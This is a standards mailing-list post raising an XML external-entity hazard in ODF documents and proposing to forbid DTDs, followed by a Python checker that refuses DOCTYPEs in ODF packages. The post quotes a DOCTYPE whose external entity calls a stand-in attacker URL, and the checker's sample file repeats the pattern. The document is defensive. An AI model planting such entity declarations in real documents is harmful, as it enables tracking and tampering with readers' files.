Subject: ODF security hazard? (ODF all versions)
Dear all,

Is an XML document starting thus, a conformant ODF document:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE office:document-content [
      <!ENTITY l33thakz SYSTEM "http://my-evil-hack-site.net/payload.php">
    ]>
    <office:document-content xmlns:office= ... (etc)

?

If the ODF processor is a conformant XML processor, then it may expand that external entity reference. This is obviously a security risk enabling tracking of users of the document, modification of the content, or certain more serious kinds of attack. These vulnerabilities are well known and documented in section 10 of RFC 3023.

I believe ODF should be modified to forbid the use of DTDs (as has been done in OOXML), as casual office application users cannot be expected to be aware of the security hazards implicit in this XML feature, or that every ODF document of unknown origin is a potential security risk.

If not, the text of ODF 1.2 should be amended to include a prominent security warning and a pointer to RFC 3023. The text of previous versions of ODF should be modified to include such a security warning.

I am *extremely* interested in this topic as I am collecting use cases for a new validation language which can be used to constrain the infoset features of XML documents. Such a language could clearly be useful for declaring that DTDs are not permitted, and be of use to future versions of ODF/OOXML if they chose that route ...

Thoughts please ...

- Alex.
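The "forbid DTDs" rule proposed in the message above can be enforced by a consumer before any ODF-aware code sees the document. The following is an added example, not part of the original post and not code from any ODF implementation: it scans the XML members of an ODF package with Python's expat bindings and refuses any that declare a DOCTYPE. The function names, the sample package and the example.invalid URL are constructed for illustration.

```python
import io
import zipfile
from xml.parsers import expat

OFFICE_NS = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"

class DTDForbidden(ValueError):
    """An XML stream carried a DOCTYPE declaration."""

def reject_dtd(xml_bytes):
    """Parse with expat and raise DTDForbidden at the first DOCTYPE.
    No ExternalEntityRefHandler is set, so no external entity is fetched."""
    parser = expat.ParserCreate()
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE on root element {name!r}")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)

def scan_odf_package(data):
    """Return [(member, reason)] for XML members that must be refused."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in sorted(pkg.namelist()):
            if not name.endswith(".xml"):
                continue
            try:
                reject_dtd(pkg.read(name))
            except DTDForbidden as exc:
                findings.append((name, str(exc)))
            except expat.ExpatError as exc:
                findings.append((name, f"not well-formed: {exc}"))
    return findings

def build_sample():
    """Constructed package: content.xml has a DTD, styles.xml does not."""
    with_dtd = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE office:document-content [\n'
        '  <!ENTITY ext SYSTEM "http://example.invalid/payload">\n'
        ']>\n'
        f'<office:document-content xmlns:office="{OFFICE_NS}"/>'
    ).encode()
    clean = f'<office:document-styles xmlns:office="{OFFICE_NS}"/>'.encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("content.xml", with_dtd)
        pkg.writestr("styles.xml", clean)
    return buf.getvalue()
```

Calling `scan_odf_package(build_sample())` reports only `content.xml`; the parse stops at the DOCTYPE, before any entity declaration is read.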